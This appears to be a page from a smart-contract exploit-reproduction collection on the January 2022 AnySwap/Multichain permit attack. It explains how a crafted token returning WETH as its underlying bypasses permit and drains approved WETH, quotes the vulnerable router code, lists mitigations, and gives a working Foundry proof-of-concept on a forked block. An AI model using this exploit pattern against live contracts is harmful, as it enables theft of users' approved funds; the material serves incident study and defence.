AnySwap Permit Attack

Total Losses

$960.0K+

Date

January 19, 2022

Network

ethereum

Step-by-step

Craft and deploy a contract so that it passes the requirements.
Find a victim that had permit the contract to use WETH.
Call anySwapOutUnderlyingWithPermit with your malicious contract and the victim’s address.

Detailed Description

Another attack that relies on an arbitry token parameter. Here, Multichain intended the token to be an Anytoken (Multichain was previously called AnySwap), which they use to track account balances when doing cross-chain transaction.

The anySwapOutUnderlyingWithPermit() method takes a token and will call permit on its underlying and then transfer from the underlying to the token.

The contract fails to take into account that WETH is special: WETH’s fallback function triggers its deposit() method and returns true and does not implement permit, so calls to permit on WETH simply return true.

To make matters worst, most of the users of Multichain had given an unlimited token allowance to the Protocol, so when the contract uses transferFrom it can use an arbitrary amount.

    function anySwapOutUnderlyingWithPermit(
        address from,
        address token,
        address to,
        uint amount,
        uint deadline,
        uint8 v,
        bytes32 r,
        bytes32 s,
        uint toChainID
    ) external {
        address _underlying = AnyswapV1ERC20(token).underlying();
        IERC20(_underlying).permit(from, address(this), amount, deadline, v, r, s);
        TransferHelper.safeTransferFrom(_underlying, from, token, amount);
        AnyswapV1ERC20(token).depositVault(amount, from);
        _anySwapOut(from, token, to, amount, toChainID);
    }

    function _anySwapOut(address from, address token, address to, uint amount, uint toChainID) internal {
        AnyswapV1ERC20(token).burn(from, amount);
        emit LogAnySwapOut(token, from, to, amount, cID(), toChainID);
    }

Here, the attacker deployed a contract that returned WETH as the underlying.

permit will pass due to the reason outlined above, even with no signature.
transferFrom will pass if the victim allowed Multichain with permit.

Then it is just a matter of findings victims.

Possible mitigations

Implement a whitelist of allowed tokens.
Avoid asking users to sign unlimited allowances.

Multichain_Permit.attack.sol

solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {IWETH9} from "../../interfaces/IWETH9.sol";

import {TokenBalanceTracker} from "../../modules/TokenBalanceTracker.sol";

interface AnyswapV4Router {
    function anySwapOutUnderlyingWithPermit(
        address from,
        address token,
        address to,
        uint256 amount,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s,
        uint256 toChainID
    ) external;
}

interface AnyswapV1ERC20 {
    function mint(address to, uint256 amount) external returns (bool);

    function burn(address from, uint256 amount) external returns (bool);

    function changeVault(address newVault) external returns (bool);

    function depositVault(uint256 amount, address to) external returns (uint256);

    function withdrawVault(address from, uint256 amount, address to) external returns (uint256);

    function underlying() external view returns (address);
}

// forge test --match-contract Exploit_Multichain -vvv
contract Exploit_Multichain is TestHarness, TokenBalanceTracker {
    address WETH_Address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    AnyswapV4Router swapRouter = AnyswapV4Router(0x6b7a87899490EcE95443e979cA9485CBE7E71522);
    AnyswapV1ERC20 swap20 = AnyswapV1ERC20(0x6b7a87899490EcE95443e979cA9485CBE7E71522);
    IWETH9 internal weth = IWETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);

    // actual attacker address: 0xFA2731d0BEde684993AB1109DB7ecf5bF33E8051;
    address internal ATTACKER = address(this);
    address internal constant VICTIM = 0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB;
    uint256 internal constant stole_WETH = 308_636_644_758_370_382_903;
    uint256 internal constant FUTURE_DEADLINE = 100_000_000_000_000_000_000;

    // In the actual attack, the attacker first exploited this with a contract
    // and then transfered to their EOA. Here, we can simplify and just transfer to
    // this contract.
    function setUp() external {
        cheat.createSelectFork(vm.envString("RPC_URL"), 14_037_236); // We pin one block before the exploit
            // happened.
        cheat.deal(address(this), 0);

        cheat.label(ATTACKER, "Attacker");
        cheat.label(VICTIM, "Victim");
        cheat.label(address(swapRouter), "AnyswapV4Router");
        cheat.label(address(swap20), "AnyswapV1ERC20");
        cheat.label(address(weth), "WETH");

        addTokenToTracker(address(weth));
        updateBalanceTracker(ATTACKER);
        updateBalanceTracker(VICTIM);
    }

    function test_attack() external {
        console.log("\nBefore Attack Balances");
        logBalancesWithLabel("Attacker", ATTACKER);
        logBalancesWithLabel("Victim", VICTIM);
        uint256 balanceBefore = weth.balanceOf(ATTACKER);

        swapRouter.anySwapOutUnderlyingWithPermit(
            VICTIM, address(this), ATTACKER, stole_WETH, FUTURE_DEADLINE, 0, bytes32(0), bytes32(0), 56
        ); // To BSC.
        console.log("\nDuring Attack Balances");
        logBalancesWithLabel("Attacker", ATTACKER);
        logBalancesWithLabel("Victim", VICTIM);

        uint256 balanceAfter = weth.balanceOf(ATTACKER);
        assertGe(balanceAfter, balanceBefore);
    }

    // Used to get the underlying of the token
    function underlying() external view returns (address) {
        return address(weth);
    }

    // For _anySwapOut() that uses AnyswapV1ERC20 to wrap the token to burn it. Just return true so that call
    // passes.
    function burn(address, uint256) external pure returns (bool) {
        return true;
    }

    //The AnyswapV1ERC20() wraps the token and calls, this function.
    function depositVault(uint256, address) external pure returns (uint256) {
        return 1;
    }
}

Reproduction Command

                
                  forge test --match-contract Exploit_Multichain -vvv

Step-by-step

Detailed Description

Possible mitigations

File Icon Multichain_Permit.attack.sol

Code Icon Reproduction Command

Multichain_Permit.attack.sol

Reproduction Command